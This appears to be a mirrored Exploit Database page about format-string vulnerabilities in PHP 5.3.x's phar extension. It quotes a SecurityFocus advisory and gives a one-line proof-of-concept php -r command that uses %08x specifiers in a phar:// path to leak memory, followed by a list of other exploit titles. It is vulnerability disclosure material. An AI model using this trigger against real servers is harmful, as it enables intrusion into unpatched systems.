PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities

Exploit Database
131 阅读

作者： Stefan Esser

日期： 2010-05-14
类别：
- remote
平台：
- php
来源：https://www.exploit-db.com/exploits/33988/

source: https://www.securityfocus.com/bid/40173/info

PHP is prone to multiple format-string vulnerabilities because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function.

Attackers can exploit these issues to run arbitrary code within the context of the PHP process. This may allow them to bypass intended security restrictions or gain elevated privileges.

PHP 5.3 through 5.3.2 are vulnerable.

$ php -r "fopen('phar:///usr/bin/phar.phar/*%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x-%08x','r');"

last Exploits
PHP 5.3.x < 5.3.2 - 'ext/phar/stream.c' / 'ext/phar/dirstream.c' Multiple Format String Vulnerabilities的更多信息

Trend Micro Control Manger 5.5 – ‘CmdProcessor.exe’ Remote Stack Buffer Overflow (Metasploit)：
Aruba ClearPass Policy Manager 6.7.0 – Unauthenticated Remote Command Execution：
APT – Repository Signing Bypass via Memory Allocation Failure：
Nginx 0.6.36 – Directory Traversal：
Mobile Mouse 3.6.0.4 – Remote Code Execution (RCE)：
Citrix Gateway – ActiveX Control Stack Buffer Overflow (Metasploit)：
D-Link Devices – ‘tools_vct.xgi’ Remote Command Execution (Metasploit)：
WinTFTP Server Pro 3.1 – Directory Traversal：